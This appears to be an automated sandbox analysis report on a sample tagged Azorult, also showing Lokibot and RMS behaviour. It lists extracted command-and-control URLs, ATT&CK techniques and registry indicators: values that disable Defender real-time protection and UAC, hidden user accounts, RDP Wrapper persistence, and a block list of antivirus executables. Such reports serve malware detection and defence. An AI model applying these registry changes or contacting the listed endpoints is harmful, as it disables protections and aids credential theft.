azorult | a1b312c9974281d57de8dc90b030f7bf6a2d95ead6c40ddc94b59007a98d404b

Analysis

max time kernel
1005s
max time network
1008s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
31-12-2024 02:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Capture d'écran 2024-09-22 075118.png
Size

185KB
MD5

efafcd714c45e172ec9313c3254ffbaa
SHA1

f17abb745adc9387c0fae51f7a9b14517db88222
SHA256

a1b312c9974281d57de8dc90b030f7bf6a2d95ead6c40ddc94b59007a98d404b
SHA512

6d34a77cb0061a3d916d66cafe5e290885f4955f03c4912b22789cb874316a8898c510d01b31e11da384e6430c05e5d452b61f78b4e88a773ebd49ad5189fedf
SSDEEP

3072:U6UKbpwBK0VKdpsjjCoUc7aCQnqMCT4+TS5lPruUhR2wP0ZAbUZ6jfsjgW1GllxQ:pwB/SGXXaBqMk4+TgUUhYwP0XgW1YlxQ

Score

10^/10

azorult lokibot rms agilenet collection defense_evasion discovery evasion execution infostealer lateral_movement persistence phishing privilege_escalation rat spyware stealer trojan upx

Malware Config

Extracted

Family

azorult

http://boglogov.site/index.php

Extracted

Family

lokibot

http://blesblochem.com/two/gates1/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Azorult family
azorult
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot

Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	taskhostw.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Rms family
rms

UAC bypass 3 TTPs 5 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe

Windows security bypass 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
6016	net.exe
1616	net1.exe

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Azorult.exe

Modifies Windows Firewall 2 TTPs 23 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
6080	netsh.exe
5928	netsh.exe
5140	netsh.exe
5364	netsh.exe
2784	netsh.exe
1548	netsh.exe
5852	netsh.exe
1892	netsh.exe
5552	netsh.exe
5476	netsh.exe
2052	netsh.exe
6052	netsh.exe
5496	netsh.exe
5512	netsh.exe
5448	netsh.exe
6088	netsh.exe
5900	netsh.exe
2232	netsh.exe
5992	netsh.exe
5804	netsh.exe
1020	netsh.exe
1568	netsh.exe
5368	netsh.exe

Patched UPX-packed file 1 IoCs

Sample is packed with UPX but required header fields are zeroed out to prevent unpacking with the default UPX tool.

resource	yara_rule
behavioral1/files/0x001900000002ac8f-1275.dat	patched_upx

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 3 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
5568	attrib.exe
4616	attrib.exe
6004	attrib.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing

Executes dropped EXE 35 IoCs

pid	Process
2240	fffc5da33ab43a787a1126db58901913b0019107c9bcaf4c7cd40a793787691d.exe
2784	fffc5da33ab43a787a1126db58901913b0019107c9bcaf4c7cd40a793787691d.exe
5288	Azorult.exe
1364	wini.exe
5732	winit.exe
3204	Lokibot.exe
5540	rutserv.exe
5968	rutserv.exe
6048	rutserv.exe
3076	rutserv.exe
5092	rfusclient.exe
4716	rfusclient.exe
1352	cheat.exe
5740	taskhost.exe
668	P.exe
996	ink.exe
5608	rfusclient.exe
5372	R8.exe
2228	winlog.exe
5768	winlogon.exe
1540	Rar.exe
5276	taskhostw.exe
5392	RDPWInst.exe
5956	winlogon.exe
3440	RDPWInst.exe
5680	Lokibot.exe
5140	taskhostw.exe
5140	taskhostw.exe
3644	taskhostw.exe
5732	taskhostw.exe
4468	taskhostw.exe
5512	taskhostw.exe
5192	taskhostw.exe
5264	taskhostw.exe
1316	taskhostw.exe

Loads dropped DLL 1 IoCs

pid	Process
772	svchost.exe

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5988	icacls.exe
1320	icacls.exe
5216	icacls.exe
5720	icacls.exe
2072	icacls.exe
2464	icacls.exe
2464	icacls.exe
4112	icacls.exe
5508	icacls.exe
240	icacls.exe
768	icacls.exe
1820	icacls.exe
3200	icacls.exe
5812	icacls.exe
2896	icacls.exe
5076	icacls.exe
852	icacls.exe
5544	icacls.exe
6020	icacls.exe
4528	icacls.exe
6088	icacls.exe
1380	icacls.exe
5908	icacls.exe
5928	icacls.exe
1780	icacls.exe
5436	icacls.exe
5868	icacls.exe
2896	icacls.exe
2232	icacls.exe
5304	icacls.exe
5824	icacls.exe
5496	icacls.exe
5720	icacls.exe
5844	icacls.exe
2872	icacls.exe
2380	icacls.exe
6020	icacls.exe
4740	icacls.exe
3644	icacls.exe
768	icacls.exe
5828	icacls.exe
5216	icacls.exe
1780	icacls.exe
5824	icacls.exe
5884	icacls.exe
3644	icacls.exe
5140	icacls.exe
5136	icacls.exe
6024	icacls.exe
2756	icacls.exe
1540	icacls.exe
2228	icacls.exe
2756	icacls.exe
5216	icacls.exe
3976	icacls.exe
5280	icacls.exe
2308	icacls.exe
5236	icacls.exe
5192	icacls.exe
1780	icacls.exe
3976	icacls.exe
5844	icacls.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/memory/3204-2484-0x0000000001430000-0x0000000001444000-memory.dmp	agile_net

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Lokibot.exe
Key opened	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	Lokibot.exe
Key opened	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	Lokibot.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5240	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
225	raw.githubusercontent.com
231	raw.githubusercontent.com
240	raw.githubusercontent.com
240	iplogger.org
244	raw.githubusercontent.com
255	iplogger.org
260	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
170	ip-api.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x001a00000002adee-2368.dat	autoit_exe
behavioral1/files/0x001900000002ae14-2469.dat	autoit_exe
behavioral1/files/0x001900000002ae1d-2558.dat	autoit_exe
behavioral1/memory/5956-2677-0x0000000000CC0000-0x0000000000DAC000-memory.dmp	autoit_exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	powershell.exe
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe
File opened for modification	C:\Windows\SysWOW64\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\symbols\exe\rutserv.pdb	rutserv.exe

Hide Artifacts: Hidden Users 1 TTPs 4 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0"	reg.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3204 set thread context of 5680	3204	Lokibot.exe	338

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002ac8f-1275.dat	upx
behavioral1/files/0x001900000002ae3d-2619.dat	upx
behavioral1/memory/5768-2622-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/5768-2649-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/files/0x001b00000002ae43-2666.dat	upx
behavioral1/memory/5956-2675-0x0000000000CC0000-0x0000000000DAC000-memory.dmp	upx
behavioral1/memory/5956-2677-0x0000000000CC0000-0x0000000000DAC000-memory.dmp	upx

Drops file in Program Files directory 27 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files (x86)\360	Azorult.exe
File opened for modification	C:\Program Files\Enigma Software Group	Azorult.exe
File opened for modification	C:\Program Files (x86)\AVG	Azorult.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files\Cezurity	Azorult.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	Azorult.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files\AVG	Azorult.exe
File opened for modification	C:\Program Files\Kaspersky Lab	Azorult.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	Azorult.exe
File opened for modification	C:\Program Files (x86)\Panda Security	Azorult.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File opened for modification	C:\Program Files (x86)\Zaxar	Azorult.exe
File opened for modification	C:\Program Files\Malwarebytes	Azorult.exe
File opened for modification	C:\Program Files\ESET	Azorult.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	Azorult.exe
File opened for modification	C:\Program Files (x86)\Cezurity	Azorult.exe
File opened for modification	C:\Program Files\Common Files\McAfee	Azorult.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	Azorult.exe
File opened for modification	C:\Program Files\ByteFence	Azorult.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files\COMODO	Azorult.exe
File opened for modification	C:\Program Files\AVAST Software	Azorult.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	Azorult.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5024	sc.exe
5688	sc.exe
2592	sc.exe
1784	sc.exe
6052	sc.exe
5452	sc.exe
1020	sc.exe
6044	sc.exe
5424	sc.exe
5456	sc.exe
5192	sc.exe
280	sc.exe
5768	sc.exe
3640	sc.exe
5936	sc.exe
6008	sc.exe
5368	sc.exe
5980	sc.exe
852	sc.exe
5868	sc.exe
2892	sc.exe
5076	sc.exe
5748	sc.exe
5872	sc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 2 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Lokibot.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winlogon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	P.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Lokibot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
